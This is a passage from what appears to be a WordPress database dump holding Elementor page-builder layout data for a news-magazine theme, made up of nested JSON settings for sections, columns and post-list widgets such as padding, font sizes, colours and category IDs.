":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1101,408,'_elementor_version','0.4'),(1102,408,'_elementor_css','a:3:{s:4:\"time\";i:1508851546;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1104,405,'post_views_count','561'),(1106,409,'_elementor_edit_mode','builder'),(1107,409,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"in485g7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"sqh26zs\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"48.082\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ni7iq5b\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"8\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#385c7b\",\"post_list1_category_background_hov_color\":\"#385c7b\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-